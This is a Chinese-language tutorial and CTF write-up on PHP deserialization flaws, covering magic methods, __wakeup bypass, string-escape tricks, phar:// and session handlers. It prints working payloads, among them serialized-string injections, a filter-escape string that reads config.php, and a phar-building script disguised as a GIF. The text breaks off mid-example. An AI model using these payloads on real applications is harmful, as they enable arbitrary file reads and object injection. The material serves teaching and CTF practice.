原标题:一文读懂四种常见的php反序列化
网安教育
培养网络安全人才
技术交流、学习咨询
0x01.前言
花些时间把四种常见的php反序列化总结了一遍,各自都找了简单示例和ctf例题,参考了一些师傅的链接加上自己的理解,如果有什么错误,请师傅们多多指点,参考链接放在文末
0x02.反序列化是什么
说到反序列化,经常会想到serialize,unserialize这两个函数。
我看到了一篇文章,文章引用我会写在文末,他先通过json_encode和json_decode两个函数帮助理解,虽然和反序列化没什么关系,但是确实对我理解反序列化有帮助的
先看看文档是如何描述的
上实例
json_encode这个函数帮助我们将这个数组序列化成一串字符串
所以在这里,我们将数组序列化成json格式的字串的目的就是为了方便传输。我们可以看见,这里json格式来保存数据主要是使用键值对的形式。
到这里就差不多了,如果说上面的json_encode函数是将数组转化成json格式的字符串,那么我们来看序列号和反序列化就是一个对象序列化成一串字符串,但仅保留对象里的成员变量,不保留函数方法
看看例子
序列化结果为:
O:6:”class1″:3:{s:1:”a”;s:1:”1″;s:4:”b”;s:5:”ThisB”;s:9:”class1c”;s:5:”ThisC”;}
对象序列化后的结构为:
O:对象名的长度:”对象名”:对象属性个数:{s:属性名的长度:”属性名”;s:属性值的长度:”属性值”;}
a是public类型的变量,s表示字符串,1表示变量名的长度,a是变量名。
b是protected类型的变量,它的变量名长度为4,也就是b前添加了%00%00。所以,protected属性的表示方式是在变量名前加上%00*%00。
c是private类型的变量,c的变量名前添加了%00类名%00。所以,private属性的表示方式是在变量名前加上%00类名%00。
虽然Test类中有test1方法,但是,序列化得到的字符串中,只保存了公有变量a,保护变量b和私有变量c,并没保存类中的方法。也可以看出,序列化不保存方法。
试试反序列化
echo和var_dump只能输出$test1->a,私有变量和protected变量都不可以
0x03.漏洞产生原理
反序列化漏洞产生的原因我个人总结就是反序列化处的参数用户可控,服务器接收我们序列化后的字符串并且未经过滤把其中的变量放入一些魔术方法里面执行,这就很容易产生漏洞。
那魔术方法是什么呢
魔术方法命名是以符号开头的,比如 construct, destruct, toString, sleep, wakeup等等。这些函数在某些情况下会自动调用。
__construct:具有构造函数的类会在每次创建新对象时先调用此方法。
__destruct:析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。
__toString方法用于一个类被当成字符串时应怎样回应。例如echo $obj;应该显示些什么。 此方法必须返回一个字符串,否则将发出一条 E_RECOVERABLE_ERROR 级别的致命错误。
__sleep方法在一个对象被序列化之前调用;
__wakeup:unserialize( )会检查是否存在一个_wakeup( )方法。如果存在,则会先调用_wakeup方法,预先准备对象需要的资源。
get,set 当调用或设置一个类及其父类方法中未定义的属性时
__invoke 调用函数的方式调用一个对象时的回应方法
call 和 callStatic前者是调用类不存在的方法时执行,而后者是调用类不存在的静态方式方法时执行。
这里通过一个实例有助于理解这几个魔术方法的执行顺序
0x04.漏洞实例
1.反序列化简单入门实例
1<?php
2classA{
3var$test = “demo”;
4function__destruct{
5echo$this->test;
6}
7}
8$a = $_GET[ test];
9$a_unser = unserialize($a);
10?>
这里我们只要构造payload:http://127.0.0.1/test.php?test=O:1:”A”:1:{s:4:”test”;s:5:”hello”;}
就能够实现控制echo输出的变量,完成一个反射型xss
这里我重新写个例子来整理一下序列化的执行过程
1<?php
2classA
3{
4var$a = “a”;
5var$b = “b\r\n”;
6
7function__construct
8{
9$this->a = “123”;
10echo“初始化时调用\r\n”;
11}
12
13function__destruct
14{
15echo“销毁时调用–“;
16echo$this->a . “\r\n”;
17}
18}
19$b = newA;
20#$ser serialize($b);
21#echo $ser;
22$ser_test = O:1:”A”:1:{s:1:”a”;s:4:”test”;};
23$unser = unserialize($ser_test);
24echo$b->b;
25?>
通过debug以及团队师傅的解惑后我才把代码运行过程捋清楚了,先放出输出结果
这里先把A类实例化为$b,触发了构造函数__construct,打印了初始化时调用,顺便把$a设置成123
接着运行,这里的反序列化不会有任何输出,以为他没有调用构造函数也没销毁,但是生成了一个A类的反序列化对象。(为什么序列化对象生成没有触发构造函数)
最后会走到echo $b->b这里,输出此时实例化的对象$b->b的值,也就是b
然后脚本结束,先销毁反序列化对象unser,输出销毁时调用,此时反序列化对象的$a是test,接着销毁实例化对象$b,也是同理。
2.wakeup绕过
1<?php
2classA{
3var$target = “test”;
4function__wakeup{
5$this->target = “wakeup!”;
6}
7function__destruct{
8$fp = fopen( “C:\\phpstudy_pro\\WWW\\unserialize\\shell.php”, “w”);
9fputs($fp, $this->target);
10fclose($fp);
11}
12}
13
14$test = $_GET[ test];
15$test_unseria = unserialize($test);
16
17echo“shell.php<br/>”;
18include( “.\shell.php”);
19?>
代码正常的执行逻辑,应该是:unserialize( )会检查是否存在一个_wakeup( )方法。本例中存在,则会先调用_wakeup方法,预先将对象中的target属性赋值为”wakeup!”。注意,不管用户传入的序列化字符串中的target属性为何值,wakeup都会把$target的值重置为”wakeup!”。最后程序运行结束,对象被销毁,调用destruct方法,将target变量的值写入文件shell.php中。这样shell.php文件中的内容就是字符串”wakeup”。
下面是一道这个知识点的ctf题目
3.[网鼎杯 2020 青龙组]AreUSerialz
先来理解一下源码:
这里先判断存不存在str传参,存在的话先拿去is_valid函数过滤一下,这里is_valid函数的作用是检查一下str字符串里面有没有存在不可打印的字符。ord函数是打印第一个字符的ASCII码必须在32到125之间
然后进入反序列化,这里反序列化后生成一个序列化对象,但是不触发任何函数,然后进程结束,序列化对象销毁,触发__destruct,判断op值如果强等于“2”则把op重置为“1”,注意这里的“2”是字符串,然后把content置空,执行process函数,进入process函数后先判断op,op等于“1”进入write函数,op等于“2”进入read函数(write函数实现一个文件写入的功能,read函数实现一个文件读取的功能)
这里我们需要进入read函数读取flag,所以需要让进入process函数的op值为2,但是我们从一开始传入op为“2”时,在进入process函数之前会在destruct被重置为1,所以我们需要绕过这个重置1
这里我们用到了强等于和弱等于,这里的destruct函数是===“2”,在process函数里面是==“2”
数字2不强等于字符串2,但是数字2弱等于字符串2,所以我们可以op设置为数字2,在destruct函数时2不强等于“2”,所以op不会被重置,进入process函数后op值2弱等于“2”,所以进入read函数进行读取flag.php
所以构造poc生成序列化字符串
这是我以前最搞不明白的地方,通过前面的总结已经可以自己写出poc了哈哈哈,这里我写写我对写poc的理解:
因为我们需要传入一个FileHandler类的序列化对象,让FileHandler类的函数执行我们序列化对象中的变量,而序列化只会保存类对象的变量,不会保存方法,所以我们只需构造这个FileHandler类的变量,将他序列化,这些变量将会在他反序列化的时候执行的魔术方法被使用,绕过魔术方法内有可利用函数,则存在反序列化漏洞
这里我们只需把三个参数的值写入然后序列化这个类即可,然后把得到的payload传入靶场进行文件读取获取flag
3.PHP反序列化字符逃逸详解
前置知识:
特点2:长度不对应会报错
漏洞产生:反序列化之所以存在字符逃逸,最主要的原因是代码中存在针对序列化(serialize)后的字符串进行了过滤操作(变多或者变少)。
漏洞常见条件:序列化后过滤再去反序列化
一、替换修改后导致序列化字符串变长
示例代码:
1<?php
2functionfilter($str)
3{
4returnstr_replace( bb, ccc, $str);
5}
6classA
7{
8public$name = aaaa;
9public$pass = 123456;
10}
11$AA = newA;
12echoserialize($AA) . “\n”;
13$res = filter(serialize($AA));
14echo$res. “\n”;
15$c=unserialize($res);
16var_dump($c);
17?>
这里我们的目的就是间接通过反序列化改变pass的值
我们先理解代码执行顺序,这里是先序列化,然后再用序列化完的字符串进行过滤
所以当name的值为aaaabb的时候,过滤完name的值是aaaaccc,七个字符,但是序列化字符串依然认为name的值是6个,所以根据上面前置知识的特性二,这里反序列化失败,var_dump($c)的结果是bool(false)
但是我们可以利用特性一去闭合,当我们让name的值为”;s:4:”pass”;s:6:”hacker”;}
首先我们要记得要满足特性一和特性二才能反序列化成功!!!
为什么现在生成的序列化字符串还能反序列化成功呢?因为我们的name的值现在
所以我们利用到了fileter函数,这个过滤函数看似想增加代码的安全性,实际上是增加了代码的危险性。
注:再解释一下我觉得这里我最开始的时候也很难理解,这里序列化后bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb”;s:4:”pass”;s:6:”hacker”;}是name的值,81个值
总结思路:
这里其实就是利用了filter函数可以替换增加字符串,每增加一个bb,在过滤函数filter替换之后会多一个字符串,我们需要构造的payload”;s:4:”pass”;s:6:”hacker”;}是27个字符串,所以我们加上27个bb是为了多出27个字符
字符串增加的例题:[0CTF 2016]piapiapia
这里为了讲反序列化的字符逃逸问题所以跳过做题思路,直接访问www.zip下载源码审
看看代码
index.php
1<?php
2require_once( class.php);
3if($_SESSION[ username]) {
4header( Location: profile.php);
5exit;
6}
7if($_POST[ username] && $_POST[ password]) {
8$username = $_POST[ username];
9$password = $_POST[ password];
10
11if(strlen($username) < 3orstrlen($username) > 16)
12die( Invalid user name);
13
14if(strlen($password) < 3orstrlen($password) > 16)
15die( Invalid password);
16
17if($user->login($username, $password)) {
18$_SESSION[ username] = $username;
19header( Location: profile.php);
20exit;
21}
22else{
23die( Invalid user name or password);
24}
25}
26else{
27?>
28<!DOCTYPE html>
29< html>
30< head>
31< title> Login </ title>
32< linkhref= “static/bootstrap.min.css”rel= “stylesheet”>
33< src= “static/jquery.min.js”> </ >
34< src= “static/bootstrap.min.js”> </ >
35</ head>
36< body>
37< divclass= “container”style= “margin-top:100px”>
38< formaction= “index.php”method= “post”class= “well”style= “width:220px;margin:0px auto;”>
39< imgsrc= “static/piapiapia.gif”class= “img-memeda “style= “width:180px;margin:0px auto;”>
40< h3> Login </ h3>
41< label> Username: </ label>
42< inputtype= “text”name= “username”style= “height:30px”class= “span3”/>
43< label> Password: </ label>
44< inputtype= “password”name= “password”style= “height:30px”class= “span3”>
45
46< buttontype= “submit”class= “btn btn-primary”> LOGIN </ button>
47</ form>
48</ div>
49</ body>
50</ html>
51<?php
52}
53?>
这里用于验证账号密码正确后,跳转到profile.php页面
profile.php:
1<?php
2require_once( class.php);
3if($_SESSION[ username] == null) {
4die( Login First);
5}
6$username = $_SESSION[ username];
7$profile=$user->show_profile($username);
8if($profile == null) {
9header( Location: update.php);
10}
11else{
12$profile = unserialize($profile);
13$phone = $profile[ phone];
14$email = $profile[ email];
15$nickname = $profile[ nickname];
16$photo = base64_encode(file_get_contents($profile[ photo]));
17?>
18<!DOCTYPE html>
19< html>
20< head>
21< title> Profile </ title>
22< linkhref= “static/bootstrap.min.css”rel= “stylesheet”>
23< src= “static/jquery.min.js”> </ >
24< src= “static/bootstrap.min.js”> </ >
25</ head>
26< body>
27< divclass= “container”style= “margin-top:100px”>
28< imgsrc= “data:image/gif;base64,<?php echo $photo; ?>”class= “img-memeda “style= “width:180px;margin:0px auto;”>
29< h3> Hi <?phpecho$nickname; ?></ h3>
30< label> Phone: <?phpecho$phone; ?></ label>
31< label> Email: <?phpecho$email; ?></ label>
32</ div>
33</ body>
34</ html>
35<?php
36}
37?>
看到涉及了反序列化函数unserialize,反序列化的几个变量是上传文件处几个参数
第一行代码就包含了class.php,也拿出来看看
1<?php
2require( config.php);
3
4classuserextendsmysql{
5private$table = users;
6
7publicfunctionis_exists($username){
8$username = parent::filter($username);
9
10$where = “username = $username”;
11returnparent::select( $this->table, $where);
12}
13publicfunctionregister($username, $password){
14$username = parent::filter($username);
15$password = parent::filter($password);
16
17$key_list = Array( username, password);
18$value_list = Array($username, md5($password));
19returnparent::insert( $this->table, $key_list, $value_list);
20}
21publicfunctionlogin($username, $password){
22$username = parent::filter($username);
23$password = parent::filter($password);
24
25$where = “username = $username”;
26$object = parent::select( $this->table, $where);
27if($object && $object->password === md5($password)) {
28returntrue;
29} else{
30returnfalse;
31}
32}
33publicfunctionshow_profile($username){
34$username = parent::filter($username);
35
36$where = “username = $username”;
37$object = parent::select( $this->table, $where);
38return$object->profile;
39}
40publicfunctionupdate_profile($username, $new_profile){
41$username = parent::filter($username);
42$new_profile = parent::filter($new_profile);
43
44$where = “username = $username”;
45returnparent::update( $this->table, profile, $new_profile, $where);
46}
47publicfunction__tostring{
48return__class__;
49}
50}
51
52classmysql{
53private$link = null;
54
55publicfunctionconnect($config){
56$this->link = mysql_connect(
57$config[ hostname],
58$config[ username],
59$config[ password]
60);
61mysql_select_db($config[ database]);
62mysql_query( “SET sql_mode=strict_all_tables”);
63
64return$this->link;
65}
66
67publicfunctionselect($table, $where, $ret = *) {
68$sql = “SELECT $ret FROM $table WHERE $where”;
69$result = mysql_query($sql, $this->link);
70returnmysql_fetch_object($result);
71}
72
73publicfunctioninsert($table, $key_list, $value_list){
74$key = implode( ,, $key_list);
75$value = \. implode( \,\, $value_list) . \;
76$sql = “INSERT INTO $table ($key) VALUES ($value)”;
77returnmysql_query($sql);
78}
79
80publicfunctionupdate($table, $key, $value, $where){
81$sql = “UPDATE $table SET $key = $value WHERE $where”;
82returnmysql_query($sql);
83}
84
85publicfunctionfilter($string){
86$escape = array( \, \\\\);
87$escape = /. implode( |, $escape) . /;
88$string = preg_replace($escape, _, $string);
89
90$safe = array( select, insert, update, delete, where);
91$safe = /. implode( |, $safe) . /i;
92returnpreg_replace($safe, hacker, $string);
93}
94publicfunction__tostring{
95return__class__;
96}
97}
98session_start;
99$user = newuser;
100$user->connect($config);
101
update.php
1<?php
2require_once( class.php);
3if($_SESSION[ username] == null) {
4die( Login First);
5}
6if($_POST[ phone] && $_POST[ email] && $_POST[ nickname] && $_FILES[ photo]) {
7
8$username = $_SESSION[ username];
9if(!preg_match( /^\d{11}$/, $_POST[ phone]))
10die( Invalid phone);
11
12if(!preg_match( /^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/, $_POST[ email]))
13die( Invalid email);
14
15if(preg_match( /[^a-zA-Z0-9_]/, $_POST[ nickname]) || strlen($_POST[ nickname]) > 10)
16die( Invalid nickname);
17
18$file = $_FILES[ photo];
19if($file[ size] < 5or$file[ size] > 1000000)
20die( Photo size error);
21
22move_uploaded_file($file[ tmp_name], upload/. md5($file[ name]));
23$profile[ phone] = $_POST[ phone];
24$profile[ email] = $_POST[ email];
25$profile[ nickname] = $_POST[ nickname];
26$profile[ photo] = upload/. md5($file[ name]);
27
28$user->update_profile($username, serialize($profile));
29echoUpdate Profile Success!<a href=”profile.php”>Your Profile</a>;
30}
31else{
32?>
33<!DOCTYPE html>
34< html>
35< head>
36< title> UPDATE </ title>
37< linkhref= “static/bootstrap.min.css”rel= “stylesheet”>
38< src= “static/jquery.min.js”> </ >
39< src= “static/bootstrap.min.js”> </ >
40</ head>
41< body>
42< divclass= “container”style= “margin-top:100px”>
43< formaction= “update.php”method= “post”enctype= “multipart/form-data”class= “well”style= “width:220px;margin:0px auto;”>
44< imgsrc= “static/piapiapia.gif”class= “img-memeda “style= “width:180px;margin:0px auto;”>
45< h3> Please Update Your Profile </ h3>
46< label> Phone: </ label>
47< inputtype= “text”name= “phone”style= “height:30px”class= “span3”/>
48< label> Email: </ label>
49< inputtype= “text”name= “email”style= “height:30px”class= “span3”/>
50< label> Nickname: </ label>
51< inputtype= “text”name= “nickname”style= “height:30px”class= “span3”>
52< labelfor= “file”> Photo: </ label>
53< inputtype= “file”name= “photo”style= “height:30px”class= “span3”/>
54< buttontype= “submit”class= “btn btn-primary”> UPDATE </ button>
55</ form>
56</ div>
57</ body>
58</ html>
59<?php
60}
61?>
填写信息后将信息序列化并过滤
config.php
1<?php
2$config[ hostname] = 127.0.0.1;
3$config[ username] = root;
4$config[ password] = ;
5$config[ database] = ;
6$flag = ;
7?>
可以看到flag在这个文件
看完代码后看看页面,有助于理解
开始审计
代码逻辑都看完后,扔seay自动审计看看
总结出三处危险函数利用,profile.php处的unserialize和file_get_contents和update.php的serialize
可以看到这里将变量$profile[photo]中的内容(也就是上传的文件)读取后进行base64编码,我们全局搜索一下这个变量
看到变量$profile[photo]是文件上传控制的但是被经过md5加密了,没办法直接传,结合反序列化函数和前面看到的filter的那些正则匹配替换函数,我们可以试着尝试反序列化的字符逃逸。
先反过来跟踪传输变量$profile的方法update_profile
这里看到经过过滤后调用update更新数据,跟踪update
update函数是把$profile变量更新放入数据库,到这里追踪就断了
上面是从后往前推,下面是从前往后推
看一下别人的文章,发现可以追踪一下$profile变量
profile.php
可以看到$profile变量是$user的show_profile函数传过来的,跟进去class.php下,user类里面
user类继承了mysql类,这里先调用了父类的filter函数。这里是替换字符串中的单引号和反斜杠为下划线 ,并且替换多个字符串为hacker。implode函数是表示把数组拼接起来,拼接符是 “|”:
然后show_profile里面又调用了父类的select函数
看到这里的数据库操作就可以和前面断了的链连接起来了
调用链从后往前推为:update.php接收传参->update_profile->class.php的update->数据库操作->class.php的select->show_profile->profile.php的file_get_contents
思路:在update.php接收上传文件传参,然后在update_profile里面执行序列化函数和过滤函数以及update更新数据库,接着show_profile通过parent::select取到$profile变量,并把$object-<profile变量return返回,最后返回的$object-<profile变量在profile.php被赋值给$profile之后反序列化并放到file_get_contents读取文件
整理好思路后看到序列化函数,反序列化以及过滤函数就可以联系到字符逃逸了。
现在我们需要让file_get_contents读取config.php,但是变量$profile[photo]被经过md5加密了,没办法直接传,我们看上他的上一个参数nickname,因为这里是序列化之后再经过filter函数替换过滤,我这也是字符逃逸的一个关键条件
绕过:
先看看两个过滤处,一个是preg_replace替换函数,一个是正则匹配函数
第一处preg_replace替换:
这里可以看到把select,insert,update等字符串替换成hacker,其他都是6个字符串,和hacker一样,并不能让字符串增多,但这里有一个where是五个字符串,替换成hacker后相当于多了一个字符串,如果我们多写几个where,就能多出多个字符串,多出来的字符串可以构造语句形成字符逃逸。
第二处正则匹配函数:
这里先对它进行了正则,这个正则的意思是匹配除了a-zA-Z0-9_之外的字符,因为 “^” 符号是在 “[]” 里面,所以是非的意思,不是开始的意思,preg_match只能处理字符串,当传入的subject是数组时会返回false,所以我们传入数组可以绕过
注:这里传数组的payload,闭合就和直接传字符串不一样,上面简单示例的payload是”;s:4:”pass”;s:6:”hacker”;}而这里数组的payload是”;}s:5:”photo”;s:10:”config.php”;}
可以看到数组的payload才能闭合,这里可以看到需要34个字符闭合在箭头处,实现字符逃逸,所以我们利用正则替换函数,用34个where替换hacker,就会多出34个字符串,从而实现字符逃逸,
所以我们这里的最终payload为:
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere”;}s:5:”photo”;s:10:”config.php”;}
实际利用
注册个账户登入来到上传文件处
抓包修改nickname[]和内容
成功拿到flag
二、替换之后导致序列化字符串变短
简单示例代码:
1<?php
2functionstr_rep($string){
3returnpreg_replace( /php|test/, , $string);
4}
5
6$test[ name] = $_GET[ name];
7$test[ sign] = $_GET[ sign];
8$test[ number] = 2020;
9$temp = str_rep(serialize($test));
10printf($temp);
11$fake = unserialize($temp);
12echo<br>;
13print( “name:”.$fake[ name]. <br>);
14print( “sign:”.$fake[ sign]. <br>);
15print( “number:”.$fake[ number]. <br>);
16?>
这段代码是接收了参数name和sign,且number是固定的,经过了序列化=>正则匹配替换字符串减少=>反序列化的过程后输出结果,我们的目的就是通过控制传参name和sign,间接改变number
我们继续像上文一样构造在sign中传”;s:6:”number”;s:4:”2000″;}看看闭合
这样子直接加入显然是不行的,由于sign的字符串个数为27,所以后面横线处的payload被当作了字符串sign的值,而没有被当作序列化语句去反序列化,所以我们还是需要过滤函数了给我们实现字符逃逸
构造payload:?name=testtesttesttesttesttest&sign=hello”;s:4:”sign”;s:4:”eval”;s:6:”number”;s:4:”2000″;}
修改了一下代码使其输出序列化后的字符串和过滤后的字符串,可以看到整个payload成功改变了number的数值,原理其实和上面字符串增多的原理是大同小异的,经过过滤后第一个横线处被当作name的值,第二处横线则被当作序列化语句执行了所以成功修改了num值,并闭合完成,第三处横线则被顶出,废弃了。
注:虽然看文章直接用payload的可以理解,但是我在思考如果遇到这种题目我自己应该如何构造payload,我怎么知道放入几个test?
构造payload思路:首先我们想让number的值改变,可以构造”;s:4:”sign”;s:4:”eval”;s:6:”number”;s:4:”2000″;}这里我们需要构造的序列化语句有两个值,sign和number,因为我们的传参是放在sign参数里面,所以需要构造一个正常的sign。(这里的闭合和字符串增多的格式是一样的)
来看一下过滤后的payload:a:3:{s:4:”name”;s:24:””;s:4:”sign”;s:54:”hello”;s:4:”sign”;s:4:”eval”;s:6:”number”;s:4:”2000″;}”;s:6:”number”;s:4:”2020″;}
红字部分就是我们需要放入的test的个数,红字部分有24个字符串(也就是name的值),所以我们需要放入24个test
其实这里的hello是来凑的,hello换成o也可以,只要是4的倍数,因为test是4个字符串,相对应的test也要减少一个
这里给出代码大家意会一下,test个数其实也就是name的值的字符串个数
与字符串增加的区别:
1、字符串增加:构造的序列化语句和过滤的值(bbbbbb)在同一个变量
字符串减少:构造的序列化语句和过滤的值不在同个变量里
2、字符串增加:构造过滤的值(bbbbbbb)的个数就是构造的序列化语句的字符串个数”;s:4:”pass”;s:6:”hacker”;}
字符串减少:构造过滤的值是name的值的个数
[安洵杯 2019]easy_serialize_php
理解一下代码:
先接收一个f的GET传参
filter函数是过滤函数,正则匹配替换字符串,字符逃逸的条件之一
extract 函数从数组中将变量导入到当前的符号表(本题的作用是将_SESSION的两个函数变为post传参)
这里本来有点疑惑,本地搭建试了一下(也是因为他才存在变量覆盖漏洞,我们才有两个可控参数)
看到传phpinfo提示可能有一些东西,进去看看
很狗,搜flag搜不到,是f1ag,直接访问文件访问不到,接着看源码
看到最底下的file_get_contents文件读取函数,那就想办法读取他
当传参是show_image时,对$serialize_info变量进行反序列化并读取
到这就不难看出了是字符逃逸的题目,因为有序列化-》过滤-》反序列化,还有个文件读取函数
这里一共有两个参数可控,分别是_SESSION[user]和_SESSION[function],读取的_SESSION[img]变量是不可控的,所以我们需要构造
键名逃逸
过滤前:a:2:{s:7:”phpflag”;s:48:”;s:1:”1″;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}
过滤后:a:2:{s:7:””;s:48:”;s:1:”1″;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}
我最开始疑惑为什么需要;s:1:”1对比完发现过滤前键名是phpflag,键值是后面48个字符串
过滤后phpflag没了,键名就变成了”;s:48:但是后面我们构造的img键值对是需要被反序列化的,已经是一对了,键名”;s:48它没有键值,所以我们应该给他一个键值;s:1:”1键值名凑和”;s:48:一样七个字符就好了,所以我们应该构造payload:_SESSION[flagphp]=;s:1:”1″;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}
看到提示我们新路径flag在/d0g3_fllllllag,将/d0g3_fllllllag去base64加密得到,L2QwZzNfZmxsbGxsbGFn
键值逃逸
这个就是上面简单示例的类型了
payload:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a”;s:8:”function”;s:4:”eval”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}
再说一次构造poc思路:”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}
先构造img的值,然后我们这里我们需要用到两个可控参数user和function,键名逃逸一个就可以了但键值逃逸需要两个,这里的user是用来传过滤字符,function参数也需要构造,这个与上面简单示例同理
所以payload:a”;s:8:”function”;s:4:”eval”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}
这里不懂为什么有个a可以参考上面简单示例构造poc思路
过滤前:a:2:{s:4:”user”;s:24:”flagflagflagflagflagflag”;s:8:”function”;s:65:”a”;s:8:”function”;s:4:”eval”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}”
过滤后:a:2:{s:4:”user”;s:24:””;s:8:”function”;s:65:”a”;s:8:”function”;s:4:”eval”;s:3:”img”;s:20:”ZDBnM19mMWFnLnBocA==”;}”
4.phar反序列化
[CISCN2019 华北赛区 Day1 Web1]Dropbox
进入题目后是一个登录框,可以注册,所以先注册进去看看先不试试注入
可以看到有上传文件和文件删除文件下载功能,自然就试试能不能文件下载flag文件,但是读不到,可以读index.php文件试试,结果index.php的提示读出下面三个文件,大概就只需要这三个文件,其他就不截图了
看到的sql语句的参数都被绑定,所以sql注入走不通
构造利用链
看到了file_get_contents函数,可以文件读取,找到在user类的destruct函数调用了此函数,
但是没有回显,所以找找可以回显的地方,在FileList类有call函数把$file->$func的值放到result,然后在destruct函数输出出来,call是上面说过是访问不存在的方法时调用,所以这条链就很明显了,先user->destruct读取FileList的close函数,因为读不到所以执行call函数,在call函数内使$file为$File类,$func为close,然后file_get_contents取到值后放入$result最后在进程结束时destruct把result打印出来。
注:我一直在疑惑为什么$func不用总结给他赋值为close,查了一下call函数,_call方法有2个参数,method和param,对应真实的方法名字和参数。所以再总结一次这里就是先在user类的destruct函数读FileList类的close,因为不存在所以调用call,在call里可以使$file->$func为$File->close,所以成功调用file_get_contents,返回结果放在result并输出。
但是这里找不到unserialize反序列化函数,应该是可以使用phar反序列化
phar反序列化前置知识
phar反序列化即在文件系统函数(file_exists、is_dir等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize直接进行反序列化操作。
具体文章https://paper.seebug.org/680/
首先了解一下phar文件的结构,一个phar文件由四部分构成:
a manifest describing the contents:phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是上述攻击手法最核心的地方。
the file contents:被压缩文件的内容。
[optional] a signature for verifying Phar integrity (phar file format only):签名,放在文件末尾
通俗的理解就是php文件系统很大一部分函数经过phar://解析时,存在着对meta-data(在这里<meta-data>区域面搞反序列化的pop链)反序列化的操做。</meta-data>
phar利用条件
1、phar文件可上传
2、文件流操作函数如file_exists,file_get_contents等影响函数要有可利用的魔术方法做跳板
3、文件流参数可控,且phar://没有被过滤,或可绕过
影响函数
绕过方法
(1)phar://被过滤
有以下几种方法可以绕过:
compress.bzip2://phar://
compress.zlib://phar:///
php://filter/resource=phar://
$z = compress.bzip2://phar:///home/sx/test.phar/test.txt;
(2)除此之外,我们还可以将phar伪造成其他格式的文件。
实际利用
生成payload
1<?php
2classUser{
3public$db;
4publicfunction__construct{
5$this->db= newFileList;
6}
7}
8
9classFileList{
10private$files;
11private$results;
12private$funcs;
13publicfunction__construct{
14$this->files= array( newFile);
15$this->results= array;
16$this->funcs= array;
17}
18}
19
20classFile{
21public$filename= “/flag.txt”;
22}
23
24$user = newUser;
25$phar = newPhar( “shell.phar”); //生成一个phar文件,文件名为shell.phar
26$phar-> startBuffering;
27$phar->setStub( “GIF89a<?php __HALT_COMPILER;?>”); //设置stub
28$phar->setMetadata($user); //将对象user写入到metadata中
29$phar->addFromString( “shell.txt”, “haha”); //添加压缩文件,文件名字为shell.txt,内容为haha
30$phar->stopBuffering;
最后把文件上传后在删除文件处抓包,?filename=phar://shell.jpg即可,这里文件上传还要改改文件类型和文件名绕过
5.session反序列化
前置知识
理解php的session之前先了解一下session是什么,这里引用百度的描述,比较官方
Session:
在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的Web页之间跳转时,存储在Session对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web页时,如果该用户还没有会话,则Web服务器将自动创建一个 Session对象。当会话过期或被放弃后,服务器将终止该会话。Session 对象最常见的一个用法就是存储用户的首选项。例如,如果用户指明不喜欢查看图形,就可以将该信息存储在Session对象中。不过不同语言的会话机制可能有所不同。
PHP session:
可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,PHP Session 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体 session 值会存储于服务器端,这也是与 cookie的主要区别,所以seesion 的安全性相对较高。
session的工作流程:
当第一次访问网站时,Seesion_start函数就会创建一个唯一的Session ID,并自动通过HTTP的响应头,将这个Session ID保存到客户端Cookie中。同时,也在服务器端创建一个以Session ID命名的文件,用于保存这个用户的会话信息。当同一个用户再次访问这个网站时,也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来,这时Session_start函数就不会再去分配一个新的Session ID,而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件,将这之前为这个用户保存的会话信息读出,在当前脚本中应用,达到跟踪这个用户的目的。
seesion_start的作用:
当会话自动开始或者通过 session_start 手动开始的时候, PHP 内部会依据客户端传来的PHPSESSID来获取现有的对应的会话数据(即session文件), PHP 会自动反序列化session文件的内容,并将之填充到 $_SESSION 超级全局变量中。如果不存在对应的会话数据,则创建名为sess_PHPSESSID(客户端传来的)的文件。如果客户端未发送PHPSESSID,则创建一个由32个字母组成的PHPSESSID,并返回set-cookie。
php.ini中一些Session配置:
1、session.save_path=”” –设置session的存储路径
2、session.save_handler=””–设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
3、session.auto_start boolen–指定会话模块是否在请求开始时启动一个会话默认为0不启动
4、session.serialize_handler string–定义用来序列化/反序列化的处理器名字。默认使用php
常见的php-session存放位置有:
1、/var/lib/php5/sess_PHPSESSID
2、/var/lib/php7/sess_PHPSESSID
3、/var/lib/php/sess_PHPSESSID
4、/tmp/sess_PHPSESSID 5 /tmp/sessions/sess_PHPSESSED
5、phpstudy集成环境下在php.ini里查找session.save_path,也可以在这里更改路径
session.serialize_handler定义的引擎有三种,如下表所示:
注:自 PHP 5.5.4 起可以使用 _phpserialize
上述三种处理器中,php_serialize在内部简单地直接使用 serialize/unserialize函数,并且不会有php和 php_binary所具有的限制。 使用较旧的序列化处理器导致$_SESSION 的索引既不能是数字也不能包含特殊字符(| 和 !) 。
注:查看版本,注意:在php 5.5.4以前默认选择的是php,5.5.4之后就是php_serialize,这里面是php_serialize,同时意识到 在index界面的时候,设置选择的是php,因此可能会造成漏洞
下面我们实例来看看三种不同处理器序列化后的结果。
1<?php
2ini_set( session.serialize_handler, php);
3//ini_set( “session.serialize_handler”, “php_serialize”);
4//ini_set( “session.serialize_handler”, “php_binary”);
5session_start;
6$_SESSION[ lemon] = $_GET[ a];
7echo“<pre>”;
